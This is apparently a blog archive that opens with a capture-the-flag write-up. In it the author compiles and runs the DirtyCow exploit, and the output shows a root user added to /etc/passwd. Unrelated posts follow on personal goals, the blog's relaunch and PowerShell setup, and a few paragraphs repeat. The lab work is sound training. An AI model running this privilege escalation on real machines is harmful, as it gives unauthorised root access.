The challenge asks us to learn about DirtyCow. Let’s do that.
On the site you can find a link to the code of the Dirty Cow explot. To get the code of the box, I create a new file with nano dirty.c and copy paste the source. CTRL+O saves the file, CTRL+X closes the editor.
In the comment header of the sourcecode we just copied, it is explained how to complile the exploit. So lets do that with gcc -pthread dirty.c -o dirty -lcrypt.
Now we run the explot. In my case, I went for the absolutely insecure password of foo when prompted.
$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password:
Complete line:
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash
mmap: 7f9ccb251000
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
With su firefart we change what user we are running as. cd ~ brings us to the home of firefart. In there we find message_from_the_grinch.txt.
firefart@christmas:~# cat message_from_the_grinch.txt
Nice work, Santa!
Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!
Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.
The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!
- Yours,
John Hammond
er, sorry, I mean, the Grinch
- THE GRINCH, SERIOUSLY
Following the instructions we use touch coal to create the coal file, then run tree | md5sum to get the final answer.
I’m usually not a huge fan of making resolutions because I get far too easy into the habit of letting them slip. Because everyone does, right?
But on the other hand, having no goals is not a good thing either. So I’m going to put a bit of pressure on myself by publicly declaring my (non work related) goals for the month.
Blog Stuff
Both as in blogging stuff as well as doing blog related stuff. So what exactly?
at least 2 more blog posts
make sure everything is GDPR compliant
write an about page
a few minor tweaks
Reading
I want to finish at least one book on my reading list and make progress on the others:
My reading List in a picture
The Go Programming Language – Donovan & Kernighan
A basic, but rather technical introduction to Go for people who already know how to program in other languages.
I’m using a lot tools written in Go for work and for a curious mind like me this leads to me wanting a better understanding of the language. Usually my brain is pretty roasted after taking care of the baby and work, so I don’t expect to make much progress in this one.
How to solve it – Polya
This is a classic and recommended read for everyone in scientific field or teachers.
Funnily enough it was recommended to me by my math teacher, the math professor while studying chemical biology and my math professor at the computer science classes. But the first two of them were so unlikable that I discarded pretty much everything they recommended. Not to my benefit.
I did read it in my first year of CS at the university and it is a great book. I’m rereading it with two goals in mind:
Getting a better grasp of English math terms (reading it in English now, not German as before)
Being reminded of the lessons for teachers, so I can explain things better once my daughter is old enough
New solutions for Cybersecurity – Shrobe, Shrier, Pentland
This is a collections of articles about Cybersecurity. I haven’t read anything in it yet, despite buying it close to the release early last year. It got mentioned quite positively in many security podcasts and conversations with colleagues.
There is not even a good reason why I have not read it yet, other than not finding the time for it.
Tribe of hackers – Carey, Jin
Here we have a interview collection with well known Hackers. I’m only in a few but so far it has been very interesting. Each interview is rather short so it fits my short time slots when the baby is busy rather well.
Kindle
Mostly for reading along SciFi audio books. I’m currently at Ryk Browns Frontier sage. But of course an occasional smut book sneaks on there as well.
Wrap up Gaming side projects
I won’t go into details here but I have a rather high number of unfinished gaming related side projects. From updated websites to Star Citizen training modules. I really have to consolidate my commitments in that area. It is getting too much for my currently available free time.
Of course finishing things takes time, but if it goes well, I should have more free time again next month.
Fitness & Diet
I used to work out & train every day as kid and young adult, then dropped the habit when I went to university. It was not exactly a healthy life since about 3 years ago when I started regular workouts again.
But in the last 2 month, since my wife is back at work and I’m alone with the baby, I both lack opportunity and motivation for workouts. In addition I picked up some unhealthy eating habits.
I tried 5 min HIIT workouts last month but being sick for a week got me off track again. So, one more try this month!
Since I added about 3kg of extra weight in the last 2 month, I’ll also put myself on an intermittent fasting once more. It already served me well when getting back into shape 3 years ago.
Will it work?
I have no clue, but it does not seem unrealistic at least. I do need more focus on my goals in my life so this is a start. I’ll tell you in a month how it went.
Gosh has it been a while since I started this blog and I only made it to two, now rather outdated posts. Not exactly what I had in mind back then but this is where it is now.
Every time a WordPress update came along or other maintenance tasks had to be done I wanted if I should just get rid of it, but that never felt right. I might return to writing some day.
I guess that day has come!
Writing has always been a way to structure my mind. There probably are several dozen of draft blog posts on my harddrive and while I never got to touching them up well enough for publication, they all served their purose at the time of writing: They allowed me to reflect on the topic and get my thoughts in order.
Writing has always been a way to structure my mind. There probably are several dozen of draft blog posts on my hard drive and while I never got to touching them up well enough for publication, they all served their purpose at the time of writing: They allowed me to reflect on the topic and get my thoughts in order.
What to expect
The tagline of the blog used to be
security. code. games. learning
That described my goals pretty well but like I said, it never really something from it. Life has changed quite a bit so I adjusted that as well.
security. code. parenting. learning. games.
Security
Eventually I want to get back to some non-NDA security research in my free time, so this stays there for now, even if I don’t expect much security posts to come this year. With changing projects, I’m pretty sure it will change as well.
Code
Like with security, there probably won’t be that many coding related posts in the near future, but security and code to me pretty much go hand in hand. Since I have a few side projects in mind for the next months, there might be something ending up here.
Parenting
We have a 11 month old daughter and I am her main caretaker. So naturally a lot of the stuff on my mind is related to her and how to be a good parent. I don’t intend to post everyday stories but discuss overarching themes and struggles.
Learning
Technically I’m still a computer science student and while I might not be very active at the university right now, this year I’m aiming for a lot of self improvement. Not really sure how much will be worth articles, but sometimes things just are easier understood when written down for others.
Games
Games have been my passion ever since. Tabletop RPGs, Board Games, Poker, LARP (Live Action Roleplay), Computer Games (esp. shooter & MMOs).
How could I not write on occasion about them?
Other Stuff
I’m sure I have forgotten some things, but this is my personal blog, so expect some random stuff as well 😉
Quick Introduction
So who am I?
In a nutshell I’m a IT-Security consultant, have a 11 month old daughter, am married for 4 years now but together with my wife for 16 years. I love games, science and metal, enjoy sports and generally speaking challenges.
And that’s it for now, I’ll eventually put a proper about me section onto the page.
Since I am usually doing most development on my Linux Laptop a decent commandline interface is something I want on windows as well. Most of this setup is inspired by this totally tooling tip.
The windows powershell on its own is quite powerful already but can be enhanced quite a bit.
Setting powershell up
Most enhancements to powershell come as modules. With PSGet you they can be managed easily. But to be able to run modules, the execution policy has to be set to allows external modules.
Set-ExecutionPolicy RemoteSigned
After that the command from PSGet installs the module manager.
Most enhancements to powershell come as modules. With PSGet you they can be managed easily. But to be able to run modules, the execution policy has to be set to allows external modules.
Set-ExecutionPolicy RemoteSigned
After that the command from PSGet installs the module manager.
Again it is installed with a one liner that you copy from their page.
The modules Author has written a nice article about how to use it.
Cmder
A really nice collection of powershell modules, skins and a way to have taps, split the window in multiple consoles and so on is cmder. The draw back is that their modules are not signed and you have to lower the rules of the execution policy even further.
